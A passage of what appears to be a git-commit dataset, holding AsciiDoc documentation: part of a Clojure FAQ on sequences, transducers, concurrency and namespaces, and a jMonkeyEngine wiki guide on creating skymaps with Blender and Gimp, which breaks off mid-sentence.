you should divide the Clojure core functions into these two categories:\n\n- Data structure functions - take a data structure and return a modified versions of that data structure (conj, disj, assoc, dissoc, etc). These functions always take the data structure _first_.\n- Sequence functions - take a \"seqable\" and return a seqable. [Generally we try to avoid committing to the return values actually being an instance of ISeq - this allows for performance optimizations in some cases.] Examples are map, filter, remove, etc. All of these functions take the seqable _last_.\n\nIt sounds like you are using the latter but expecting the semantics of the former (which is a common issue for new Clojurists!). If you want to apply sequence functions but have more control over the output data structure, there are a number of ways to do that.\n\n. Use data-structure equivalents like mapv or filterv, etc - this is a very limited set that lets you perform these ops but return a data structure rather than a seqable. `(mapv inc (filterv odd? [1 2 3]))`\n. Pour the results of your sequence transformations back into a data structure with into: `(into [] (map inc (filter odd? [1 2 3])))`\n. Use transducers (likely with `into`) - this has much the same effect as #2, but combinations of transformations can be applied more efficiently without creating any sequences - only the final result is built: `(into [] (comp (filter odd?) (map inc)) [1 2 3])`. As you work with larger sequences or more transformations, this makes a significant difference in performance.\n\nNote that all of these are eager transformations - they produce the output vector when you invoke them. The original sequence version `(map inc (filter odd? [1 2 3]))` is lazy and will only produce values as needed (with chunking under the hood for greater performance). Neither of these is right or wrong, but they are both useful in different circumstances.\n\n[[transducers_vs_seqs]]\n**What are good use cases for transducers?**\n\nWhen performing a series of transformations, sequences will create an intermediate (cached) sequence between each transformation. Transducers create a single compound transformation that is executed in one eager pass over the input. These are different models, which are both useful.\n\nPerformance benefits of transducers:\n\n- Source collection iteration - when used on reducible inputs (collections and other things), avoid creating an unnecessary input collection sequence - helps memory and time.\n- Intermediate sequences and cached values - as the transformation happens in a single pass, you remove all intermediate sequence and cached value creation - again, helps memory and time. The combination of the the prior item and this one will start to win big as the size of the input collection or number of transformations goes up (but for small numbers of either, chunked sequences can be surprisingly fast and will compete).\n\nDesign \/ usage benefits of transducers:\n\n- Transformation composition - some use cases will have a cleaner design if they separate transformation composition from transformation application. Transducers support this.\n- Eagerness - transducers are great for cases where eagerly processing a transformation (and potentially encountering any errors) is more important than laziness\n- Resource control - because you have more control over when the input collection is traversed, you also know when processing is complete. It's thus easier to release or clean up input resources because you know when that happens.\n\nPerformance benefits of sequences:\n\n- Laziness - if you will only need some of the outputs (for example a user is deciding how many to use), then lazy sequences can often be more efficient in deferring processing. In particular, sequences can be lazy with intermediate results, but transducers use a pull model that will eagerly produce all intermediate values.\n- Infinite streams - because transducers are typically eagerly consumed, they don't match well with infinite streams of values\n\nDesign benefits of sequences:\n\n- Consumer control - returning a seq from an API lets you combine input + transformation into something that gives the consumer control. Transducers don't work as well for this (but will work better for cases where input and transformation are separated).\n\n\n== State and Concurrency\n\n[[concurrency_features]]\n**What are the trade-offs between reducers, core.async, and futures?**\n\nEach of these really addresses a different use case.\n\n- Reducers are best for fine-grained data parallelism when computing a transformation over existing in-memory data (in a map or vector). Generally it's best when you have thousands of small data items to compute over and many cores to do the work. Anything described as \"embarrassingly parallel\".\n- futures are best for pushing work onto a background thread and picking it up later (or for doing I\/O waits in parallel). It's better for big chunky tasks (go fetch a bunch of data in the background).\n- core.async is primarily used to organize the subsystems or internal structure of your application. It has channels (queues) to convey values from one \"subprocess\" (go block) to another. So you're really getting concurrency and architectural benefits in how you break up your program. The killer feature you can really only get in core.async is the ability to wait on I\/O events from multiple channels for the first response on any of them (via alt\/alts). Promises can also be used to convey single values between independent threads\/subprocesses but they are single delivery only.\n- you didn't mention pmap, but tools like pmap, java.util queues and executors, and libraries like claypoole are doing coarse-level \"task\" concurrency. There is some overlap with core.async here which has a very useful transducer-friendly pipeline functionality.\n\n[[write_skew]]\n**Why does the Clojure STM does not guarantee serializability but only snapshot isolation?**\n\nIf reads were included by default, then STM would be slower (as more transactions would require serializability). However, in many cases, reads do not need to be included. Thus, users can choose to accept the performance penalty when it is necessary and get faster performance when it is not.\n\n== Namespaces\n\n[[ns_file]]\n**Do namespaces map 1-to-1 with files?**\n\nNo (although that is typical). One namespace can be split across multiple files by using `load` to load secondary files and `in-ns` in those files to retain the namespace (clojure.core is defined in this way). Also, it is possible to declare multiple namespaces in a single file (although this is very unusual).\n\n[[ns_as_fn]]\n**Do namespaces work like regular functions? Looking at the syntax, it seems ns could be returning a function that makes a namespace, and then if you just stick parens around the contents of the file, that would be a regular S expression too. Does that imply you can put more than one in a file?**\n\nns is a macro that does a number of things:\n\n- creates a new internal Namespace object (if it does not yet exist)\n- makes that namespace the new current namespace (*ns*)\n- auto-refers all vars from clojure.core and imports all classes from java.lang\n- requires\/refers other namespaces and vars as specified\n- (and other optional things)\n\nns does not return a function or anything invokable as you suggest.\n\nWhile ns is typically placed at the top of a clj file, it is actually just a normal macro and can be invoked at the repl just the same. It could also be used more than once in a single file (although this would be surprising to most clj programmers and would likely not work as desired in AOT).\n\n== Compiler\n\n[[direct_linking_repl]]\n**How does direct linking affect the REPL experience?**\n\nAnything that has been direct linked will not see redefinitions to vars. For example, if you redefine something in clojure.core, other parts of core that use that var will not see the redefinition (however anything that you newly compile at the REPL will). In practice, this is not typically a problem.\n\nFor parts of your own app, you may wish to only enable direct linking when you build and deploy for production, rather than using it when you developing at the REPL. Or you may need to mark parts of your app with ^:redef if you want to always allow redefinition or ^:dynamic for dynamic vars.\n\n== Design and Use\n\n[[encapsulation]]\n**How do you achieve encapsulation with Clojure?**\n\nBecause of its focus on immutable data, there is generally not a high value placed on data encapsulation. Because data is immutable, there is no worry about someone else modifying a value. Likewise, because Clojure data is designed to be manipulated directly, there is significant value in providing direct access to data, rather than wrapping it in APIs.\n\nAll Clojure vars are globally available so again there is not much in the way of encapsulation of functions within namespaces. However, the ability to mark vars private (either using `defn-` for functions or `def` with `^:private` for values) is a convenience for a developer to indicate which parts of an API should be considered public for use vs part of the implementation.\n\n","old_contents":"= Frequently Asked Questions\nAlex Miller\n2015-01-01\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThese questions and answers are adapted from mailing lists and other Clojure community forums.\n\n== Reader and Syntax\n\n[[why_keywords]]\n**What's the advantage of representing text tokens as keywords (instead of as strings)?**\n\nKeywords are cached and interned. This means that a keyword is reused (reducing memory) everywhere in your program and that checks for equality really become checks for identity (which are fast).\n\n[[reader_macros]]\n**Why does Clojure not have user-extensible reader macros?**\n\nThe reader takes text (Clojure source) and returns Clojure data, which is subsequently compiled and evaluated. Reader macros tell the Clojure reader how to read something that is not a typical s-expression (examples are things like quoting `'` and anonymous functions `#()`). Reader macros can be used to define entirely new syntaxes read by the reader (for example: JSON, XML, or other formats) - this is a more powerful syntactic capability than regular macros (which come into play later at compile time). \n\nHowever, unlike Lisp, Clojure does not allow the user to extend this set of reader macros. This avoids the possibility of creating code that another user cannot read (because they do not have the proper reader macros). Clojure gives back some of the power of reader macros with tagged literals, allowing you to create generically readable _data_, that is still extensible.\n\n[[underscore]]\n**What does an _ mean in a let binding or parameter?**\n\n_ has no special meaning in Clojure as a symbol. However, it is a convention to use _ (or a leading _) to denote a binding that will not be used in the expression.\n\n[source,clojure]\n----\n(defn get-x [point]\n (let [[x _] point] ;; y-value of point is unused, so mark it with _\n x))\n----\n\n== Collections, Sequences, and Transducers\n\n[[conj]]\n**Why does `conj` add to the front of a list and the back of a vector?**\n\nMost Clojure data structure operations, including `conj` (conjoin), are designed to give the user a performance expectation. With `conj`, the expectation is that insertion should happen at the place where this operation is efficient. Lists (as linked lists) can make a constant time insertion only at the front. Vectors (indexed) are designed to expand at the back. As the user, you should consider this when you choose which data structure to use. In Clojure, vectors are used with much greater frequency.\n\n[[seqs_vs_colls]]\n**I keep forgetting that after calling sequence functions on vectors\/sets, the return value no longer is no longer has vector or set semantics.**\n\nGenerally you should divide the Clojure core functions into these two categories:\n\n- Data structure functions - take a data structure and return a modified versions of that data structure (conj, disj, assoc, dissoc, etc). These functions always take the data structure _first_.\n- Sequence functions - take a \"seqable\" and return a seqable. [Generally we try to avoid committing to the return values actually being an instance of ISeq - this allows for performance optimizations in some cases.] Examples are map, filter, remove, etc. All of these functions take the seqable _last_.\n\nIt sounds like you are using the latter but expecting the semantics of the former (which is a common issue for new Clojurists!). If you want to apply sequence functions but have more control over the output data structure, there are a number of ways to do that.\n\n. Use data-structure equivalents like mapv or filterv, etc - this is a very limited set that lets you perform these ops but return a data structure rather than a seqable. `(mapv inc (filterv odd? [1 2 3]))`\n. Pour the results of your sequence transformations back into a data structure with into: `(into [] (map inc (filter odd? [1 2 3])))`\n. Use transducers (likely with `into`) - this has much the same effect as #2, but combinations of transformations can be applied more efficiently without creating any sequences - only the final result is built: `(into [] (comp (filter odd?) (map inc)) [1 2 3])`. As you work with larger sequences or more transformations, this makes a significant difference in performance.\n\nNote that all of these are eager transformations - they produce the output vector when you invoke them. The original sequence version `(map inc (filter odd? [1 2 3]))` is lazy and will only produce values as needed (with chunking under the hood for greater performance). Neither of these is right or wrong, but they are both useful in different circumstances.\n\n[[transducers_vs_seqs]]\n**What are good use cases for transducers?**\n\nWhen performing a series of transformations, sequences will create an intermediate (cached) sequence between each transformation. Transducers create a single compound transformation that is executed in one eager pass over the input. These are different models, which are both useful.\n\nPerformance benefits of transducers:\n\n- Source collection iteration - when used on reducible inputs (collections and other things), avoid creating an unnecessary input collection sequence - helps memory and time.\n- Intermediate sequences and cached values - as the transformation happens in a single pass, you remove all intermediate sequence and cached value creation - again, helps memory and time. The combination of the the prior item and this one will start to win big as the size of the input collection or number of transformations goes up (but for small numbers of either, chunked sequences can be surprisingly fast and will compete).\n\nDesign \/ usage benefits of transducers:\n\n- Transformation composition - some use cases will have a cleaner design if they separate transformation composition from transformation application. Transducers support this.\n- Eagerness - transducers are great for cases where eagerly processing a transformation (and potentially encountering any errors) is more important than laziness\n- Resource control - because you have more control over when the input collection is traversed, you also know when processing is complete. It's thus easier to release or clean up input resources because you know when that happens.\n\nPerformance benefits of sequences:\n\n- Laziness - if you will only need some of the outputs (for example a user is deciding how many to use), then lazy sequences can often be more efficient in deferring processing. In particular, sequences can be lazy with intermediate results, but transducers use a pull model that will eagerly produce all intermediate values.\n- Infinite streams - because transducers are typically eagerly consumed, they don't match well with infinite streams of values\n\nDesign benefits of sequences:\n\n- Consumer control - returning a seq from an API lets you combine input + transformation into something that gives the consumer control. Transducers don't work as well for this (but will work better for cases where input and transformation are separated).\n\n\n== State and Concurrency\n\n[[concurrency_features]]\n**What are the trade-offs between reducers, core.async, and futures?**\n\nEach of these really addresses a different use case.\n\n- Reducers are best for fine-grained data parallelism when computing a transformation over existing in-memory data (in a map or vector). Generally it's best when you have thousands of small data items to compute over and many cores to do the work. Anything described as \"embarrassingly parallel\".\n- futures are best for pushing work onto a background thread and picking it up later (or for doing I\/O waits in parallel). It's better for big chunky tasks (go fetch a bunch of data in the background).\n- core.async is primarily used to organize the subsystems or internal structure of your application. It has channels (queues) to convey values from one \"subprocess\" (go block) to another. So you're really getting concurrency and architectural benefits in how you break up your program. The killer feature you can really only get in core.async is the ability to wait on I\/O events from multiple channels for the first response on any of them (via alt\/alts). Promises can also be used to convey single values between independent threads\/subprocesses but they are single delivery only.\n- you didn't mention pmap, but tools like pmap, java.util queues and executors, and libraries like claypoole are doing coarse-level \"task\" concurrency. There is some overlap with core.async here which has a very useful transducer-friendly pipeline functionality.\n\n[[write_skew]]\n**Why does the Clojure STM does not guarantee serializability but only snapshot isolation?**\n\nIf reads were included by default, then STM would be slower (as more transactions would require serializability). However, in many cases, reads do not need to be included. Thus, users can choose to accept the performance penalty when it is necessary and get faster performance when it is not.\n\n== Namespaces\n\n[[ns_file]]\n**Do namespaces map 1-to-1 with files?**\n\nNo (although that is typical). One namespace can be split across multiple files by using `load` to load secondary files and `in-ns` in those files to retain the namespace (clojure.core is defined in this way). Also, it is possible to declare multiple namespaces in a single file (although this is very unusual).\n\n[[ns_as_fn]]\n**Do namespaces work like regular functions? Looking at the syntax, it seems ns could be returning a function that makes a namespace, and then if you just stick parens around the contents of the file, that would be a regular S expression too. Does that imply you can put more than one in a file?**\n\nns is a macro that does a number of things:\n\n- creates a new internal Namespace object (if it does not yet exist)\n- makes that namespace the new current namespace (*ns*)\n- auto-refers all vars from clojure.core and imports all classes from java.lang\n- requires\/refers other namespaces and vars as specified\n- (and other optional things)\n\nns does not return a function or anything invokable as you suggest.\n\nWhile ns is typically placed at the top of a clj file, it is actually just a normal macro and can be invoked at the repl just the same. It could also be used more than once in a single file (although this would be surprising to most clj programmers and would likely not work as desired in AOT).\n\n== Compiler\n\n[[direct_linking_repl]]\n**How does direct linking affect the REPL experience?**\n\nAnything that has been direct linked will not see redefinitions to vars. For example, if you redefine something in clojure.core, other parts of core that use that var will not see the redefinition (however anything that you newly compile at the REPL will). In practice, this is not typically a problem.\n\nFor parts of your own app, you may wish to only enable direct linking when you build and deploy for production, rather than using it when you developing at the REPL. Or you may need to mark parts of your app with ^:redef if you want to always allow redefinition or ^:dynamic for dynamic vars.\n\n== Design and Use\n\n[[encapsulation]]\n**How do you achieve encapsulation with Clojure?**\n\nBecause of its focus on immutable data, there is generally not a high value placed on data encapsulation. Because data is immutable, there is no worry about someone else modifying a value. Likewise, because Clojure data is designed to be manipulated directly, there is significant value in providing direct access to data, rather than wrapping it in APIs.\n\nAll Clojure vars are globally available so again there is not much in the way of encapsulation of functions within namespaces. However, the ability to mark vars private (either using `defn-` for functions or `def` with `^:private` for values) is a convenience for a developer to indicate which parts of an API should be considered public for use vs part of the implementation.\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1d20b96f36396d14b3636daf1e65cdd31c082b9d","subject":"Update free_skymaps.adoc","message":"Update free_skymaps.adoc\n\nSeparated out angular maps browsing into own heading.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_contents":"= How to create free SkyMaps\n:author: Robert Allen\n:revnumber: \n:revdate: 2017\/04\/4 10:23\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nThere are a plethora of ways to create skymaps with varying levels of difficulty and expense. The link:http:\/\/planetside.co.uk\/[Terragen] program has been mentioned as one way to do so but it is now limited in its use and for commercial purposes is not free. Another program, link:https:\/\/www.daz3d.com\/bryce-7-pro[Bryce], is also not free and seems to of stalled in development based off there only being a 32bit version available. Maybe they are doing things behind the scenes but its still not a free program. This articles intent is to give the JME3 user other options for the creation of skymaps using the free programs Blender and Gimp. It is not the be all, end all of skymap creation. If you know of better methods or tools please feel free to share your wisdom on the link:https:\/\/hub.jmonkeyengine.org\/[forums].\n\n\n== Blender\n\n\nUsing Blender you can create your skymaps for free. Once link:https:\/\/www.blender.org\/[Blender] is setup, your skymaps creation can be done easily. For this article I will go into detail on how to setup Blender to create Angular maps based off a video produced by jMonkey contributor glaucomardano and mentioned in this link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-tutorial-how-to-create-skymaps-using-blender\/19313[forum post]. Contributor glaucomardano did a good job on the video but it requires previous knowledge of Blender to be able to easily follow along. As such, I will translate it to paper for you. You can view his video by following this link: link:https:\/\/youtu.be\/z38Aikz5nE8[jMonkeyEngine Tutorial - How to create skymaps using blender].\n\n[NOTE]\n====\nThis tutorial is an adaptation of contributor glaucomardanos production, not an exact duplicate. +\nThese steps assume you're using the default blender setup and apply to vers 2.78c+. +\nThis is in checklist format so you can mark items as you go to keep your place.\n====\n\n[%interactive]\n.Blender Skybox Checklist\n- [ ] Start with a new file in blender.\n- [ ] Select the lamp and the default cube in the 3d view or in the Outliner panel (top-right panel) and delete them: kbd:[X]. They are not needed for this procedure.\n- [ ] Select the camera object in the 3d view or in the Outliner panel then clear its location and rotation by using keyboard shortcuts kbd:[Alt]+kbd:[G] and kbd:[Alt]+kbd:[R].\n- [ ] In the properties panel (lower-right panel) select the Object tab (orange box). This will give you a visual perspective of the camera changes you are about to make.\n- [ ] Rename the Camera to Camera-north.\n- [ ] Change your 3d view to top-ortho by pressing kbd:[NumPad 7] followed by kbd:[NumPad 5].\n- [ ] With the camera still selected, press kbd:[R] immediately followed by kbd:[X] immediately followed by 90 immediately followed by kbd:[Enter] to rotate the camera 90 degrees around the X axis.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] Press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees around the Z axis. Rename this camera to Camera-south.\n-\u00a0[ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera another 90 degrees around the Z axis. Rename this camera to Camera-west.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\u00a0\u00a0 \n- [ ] With the camera still selected, press kbd:[R] immediately followed by -180 immediately followed by kbd:[Enter]. This will rotate the camera -180 degrees around the Z axis. Rename this camera to Camera-east.\n- [ ] With your mouse inside the 3d view change your view to right-ortho by entering kbd:[NumPad 3].\n- [ ] Select Camera-south in 3d view or in the Outliner panel (top-right panel) and press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera 90 degrees around the X axis. The camera should now be pointing up. Rename this camera to Camera-up.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees along the X axis. The camera should now be facing down. Rename this camera to Camera-down.\n- [ ] Save your file.\n\n[%interactive]\n.Angular Map\n- [ ] Open up a web browser and search for \"free high res skymap\" and select a Angular map of your choice or you can find some here at link:https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529[https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529] instead. Remember to select an *ANGULAR* map.\n- [ ] Save a map to your pc in a place you can easily locate it from later in blender.\n\n[%interactive]\n.Textures Tab\n- [ ] From the properties panel (bottom-right panel) select the Textures tab (red-white checkerboard) then press the new button to create a new texture. Rename this texture to AngMap.\n- [ ] Under the Image panel select open and navigate to the file you saved earlier.\n- [ ] In the Mapping panel select AngMap from the drop down box.\n- [ ] In the Influence panel de-select blend (ble) and select horizon (hor).\n\n[%interactive]\n.Data Tab\n- [ ] From the properties panel select the Data tab (reel to reel camera).\n- [ ] In the lens panel change the Focal Lens value from 35 to 16. Do this for every camera.\n\n[%interactive]\n.Render Tab\n- [ ] From the properties panel select the Render tab (normal looking camera).\n- [ ] In the Dimensions panel set the resolution to any number that is a power of 2. For this example 1024 x 1024. \n- [ ] Slide the resolution scale to 100%.\n- [ ] In the Output panel change the image type to JPEG. I have found out by trial and error that using a JPEG file has the same image quality as a PNG or DDS file but with a huge difference in image size. A single PNG image will clock in at over 8mb to the JPEG size of 325kb. Even converting to a DDS file comes in at over 3mb for comparison (using RGB888 as is recommended by Momoko_Fan\/Core Developer in this link:https:\/\/hub.jmonkeyengine.org\/t\/best-dds-format-for-skyfactory\/17668\/2[forum post]) with no gain in image quality that I could see. Your welcome to experiment on your own if you wish.\n- [ ] Set the image format to RGB.\n- [ ] Setting the quality slider to 0 has the effect of reducing the image size. In this example it reduced the image sizes to less than 125kb, once again with no discernable image degradation that I could see.\n\n[%interactive]\n.World Tab\n- [ ] In the properties panel select the World tab.\n- [ ] Check the Real Sky toggle.\n\n[%interactive]\n.Map Generator Setup \n- [ ] From the header at the top of the 3d view click the btn:[Choose Screen Layout] button next to the word `Default` and select `Split Verticle F\/R`. \n- [ ] Click the `+` sign to create a new layout. \n- [ ] Rename this new layout Angular Map Generator or a name of your choosing.\n- [ ] In the left side 3d view, at the bottom, next to the word view, is the btn:[Current Editor Type] button. Click it and change it to `UV\/Image Editor`.\n- [ ] Place your mouse inside the right side 3d view and press kbd:[NumPad 5] to toggle ortho view. You're now setup to render your Angular map.\n- [ ] Save your file.\n\n[%interactive]\n.Rendering And Saving\n- [ ] With your first camera selected (in this case Camera-down) and your mouse inside the right side 3d view, press kbd:[Ctrl]+kbd:[NumPad 0] to set your selected camera to be the active camera.\u00a0\n- [ ] Press kbd:[F12] to render the scene. A image will appear in the left side UV\/Image Editor.\n- [ ] With your mouse inside the left side UV\/Image Editor you can scroll in or out to center the view.\n- [ ] With your mouse inside the left side UV\/Image Editor press kbd:[F3] to save your image. Rename the image (down.jpg in this case). \n\nFollow this same procedure for the remaining cameras. Rendering, renaming and saving each. After you have rendered all your images you can copy and paste them into your asset folder for JME3. Usually under the Texture directory. To use them in your code, in simpleInitApp(), load the Textures and use the SkyFactory to create your sky.\n\n[source,java]\n----\nTexture west = getAssetManager().loadTexture(\"Textures\/Sky\/west.jpg\");\nTexture east = getAssetManager().loadTexture(\"Textures\/Sky\/east.jpg\");\nTexture north = getAssetManager().loadTexture(\"Textures\/Sky\/north.jpg\");\nTexture south = getAssetManager().loadTexture(\"Textures\/Sky\/south.jpg\");\nTexture up = getAssetManager().loadTexture(\"Textures\/Sky\/up.jpg\");\nTexture down = getAssetManager().loadTexture(\"Textures\/Sky\/down.jpg\");\ngetRootNode().attachChild(SkyFactory.createSky(getAssetManager(), west, east, north, south, up, down));\n----\n\nListed below are other Blender tutorials JME3 users may find valuable. \n\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/cycles-skybox.php[Render a Skybox using Cycles]\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/render-skybox.php[Render a Skybox Environment Map]\n\nMany thanks go out to contributor glaucomardano for his video. He has excellent taste in music.\n\n\n== Gimp\n\n\nYou can use link:https:\/\/www.gimp.org\/[Gimp] to create SkyMaps from a single image with the addition of 2 scripts.\n\n* link:https:\/\/code.google.com\/archive\/p\/gimp-dds\/[Gimp-dds]\n* link:http:\/\/registry.gimp.org\/node\/25532[Cubemap Layers Generator]\n\nAfter installing the scripts you open a image in gimp. This script works by slicing up the image into 6 layers of equal size, each by the power of 2. \n\n. After you open the image you select `menu:Filters[Generic > Cubemap Layers Generator]`.\n. Fill in the details as follows. \n** Source: navigate to the image you are slicing.\n**\u00a0 Cubemap layout: `Cross Horizontal`\n** 2 to the power of: `10` (for 1024 sized Layers) \n. Press btn:[OK] to slice up the image.\n. Select `menu:File[Export As]` and change the `Name` and `File Type` to `.dds` and choose your save location to export into.\n. Press btn:[Export].\n* Compression: `None`\n* Format: `RGB8`\n* Save: `As cube map`\n* MipMaps: `No mipmaps`\n. Press btn:[OK] to export.\n\nYou add it to your scene as is explained in the <<jme3\/advanced\/sky#,How to add a Sky to your Scene>> tutorial.\n","old_contents":"= How to create free SkyMaps\n:author: Robert Allen\n:revnumber: \n:revdate: 2017\/04\/4 10:23\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nThere are a plethora of ways to create skymaps with varying levels of difficulty and expense. The link:http:\/\/planetside.co.uk\/[Terragen] program has been mentioned as one way to do so but it is now limited in its use and for commercial purposes is not free. Another program, link:https:\/\/www.daz3d.com\/bryce-7-pro[Bryce], is also not free and seems to of stalled in development based off there only being a 32bit version available. Maybe they are doing things behind the scenes but its still not a free program. This articles intent is to give the JME3 user other options for the creation of skymaps using the free programs Blender and Gimp. It is not the be all, end all of skymap creation. If you know of better methods or tools please feel free to share your wisdom on the link:https:\/\/hub.jmonkeyengine.org\/[forums].\n\n\n== Blender\n\n\nUsing Blender you can create your skymaps for free. Once link:https:\/\/www.blender.org\/[Blender] is setup, your skymaps creation can be done easily. For this article I will go into detail on how to setup Blender to create Angular maps based off a video produced by jMonkey contributor glaucomardano and mentioned in this link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-tutorial-how-to-create-skymaps-using-blender\/19313[forum post]. Contributor glaucomardano did a good job on the video but it requires previous knowledge of Blender to be able to easily follow along. As such, I will translate it to paper for you. You can view his video by following this link: link:https:\/\/youtu.be\/z38Aikz5nE8[jMonkeyEngine Tutorial - How to create skymaps using blender].\n\n[NOTE]\n====\nThis tutorial is an adaptation of contributor glaucomardanos production, not an exact duplicate. +\nThese steps assume you're using the default blender setup and apply to vers 2.78c+. +\nThis is in checklist format so you can mark items as you go to keep your place.\n====\n\n[%interactive]\n.Blender Skybox Checklist\n- [ ] Start with a new file in blender.\n- [ ] Select the lamp and the default cube in the 3d view or in the Outliner panel (top-right panel) and delete them: kbd:[X]. They are not needed for this procedure.\n- [ ] Select the camera object in the 3d view or in the Outliner panel then clear its location and rotation by using keyboard shortcuts kbd:[Alt]+kbd:[G] and kbd:[Alt]+kbd:[R].\n- [ ] In the properties panel (lower-right panel) select the Object tab (orange box). This will give you a visual perspective of the camera changes you are about to make.\n- [ ] Rename the Camera to Camera-north.\n- [ ] Change your 3d view to top-ortho by pressing kbd:[NumPad 7] followed by kbd:[NumPad 5].\n- [ ] With the camera still selected, press kbd:[R] immediately followed by kbd:[X] immediately followed by 90 immediately followed by kbd:[Enter] to rotate the camera 90 degrees around the X axis.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] Press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees around the Z axis. Rename this camera to Camera-south.\n-\u00a0[ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera another 90 degrees around the Z axis. Rename this camera to Camera-west.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\u00a0\u00a0 \n- [ ] With the camera still selected, press kbd:[R] immediately followed by -180 immediately followed by kbd:[Enter]. This will rotate the camera -180 degrees around the Z axis. Rename this camera to Camera-east.\n- [ ] With your mouse inside the 3d view change your view to right-ortho by entering kbd:[NumPad 3].\n- [ ] Select Camera-south in 3d view or in the Outliner panel (top-right panel) and press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera 90 degrees around the X axis. The camera should now be pointing up. Rename this camera to Camera-up.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees along the X axis. The camera should now be facing down. Rename this camera to Camera-down.\n- [ ] Save your file.\n- [ ] Open up a web browser and search for \"free high res skymap\" and select a Angular map of your choice or you can find some here at link:https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529[https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529] instead. Remember to select an *ANGULAR* map.\n- [ ] Save a map to your pc in a place you can easily locate it from later in blender.\n\n[%interactive]\n.Textures Tab\n- [ ] From the properties panel (bottom-right panel) select the Textures tab (red-white checkerboard) then press the new button to create a new texture. Rename this texture to AngMap.\n- [ ] Under the Image panel select open and navigate to the file you saved earlier.\n- [ ] In the Mapping panel select AngMap from the drop down box.\n- [ ] In the Influence panel de-select blend (ble) and select horizon (hor).\n\n[%interactive]\n.Data Tab\n- [ ] From the properties panel select the Data tab (reel to reel camera).\n- [ ] In the lens panel change the Focal Lens value from 35 to 16. Do this for every camera.\n\n[%interactive]\n.Render Tab\n- [ ] From the properties panel select the Render tab (normal looking camera).\n- [ ] In the Dimensions panel set the resolution to any number that is a power of 2. For this example 1024 x 1024. \n- [ ] Slide the resolution scale to 100%.\n- [ ] In the Output panel change the image type to JPEG. I have found out by trial and error that using a JPEG file has the same image quality as a PNG or DDS file but with a huge difference in image size. A single PNG image will clock in at over 8mb to the JPEG size of 325kb. Even converting to a DDS file comes in at over 3mb for comparison (using RGB888 as is recommended by Momoko_Fan\/Core Developer in this link:https:\/\/hub.jmonkeyengine.org\/t\/best-dds-format-for-skyfactory\/17668\/2[forum post]) with no gain in image quality that I could see. Your welcome to experiment on your own if you wish.\n- [ ] Set the image format to RGB.\n- [ ] Setting the quality slider to 0 has the effect of reducing the image size. In this example it reduced the image sizes to less than 125kb, once again with no discernable image degradation that I could see.\n\n[%interactive]\n.World Tab\n- [ ] In the properties panel select the World tab.\n- [ ] Check the Real Sky toggle.\n\n[%interactive]\n.Map Generator Setup \n- [ ] From the header at the top of the 3d view click the btn:[Choose Screen Layout] button next to the word `Default` and select `Split Verticle F\/R`. \n- [ ] Click the `+` sign to create a new layout. \n- [ ] Rename this new layout Angular Map Generator or a name of your choosing.\n- [ ] In the left side 3d view, at the bottom, next to the word view, is the btn:[Current Editor Type] button. Click it and change it to `UV\/Image Editor`.\n- [ ] Place your mouse inside the right side 3d view and press kbd:[NumPad 5] to toggle ortho view. You're now setup to render your Angular map.\n- [ ] Save your file.\n\n[%interactive]\n.Rendering And Saving\n- [ ] With your first camera selected (in this case Camera-down) and your mouse inside the right side 3d 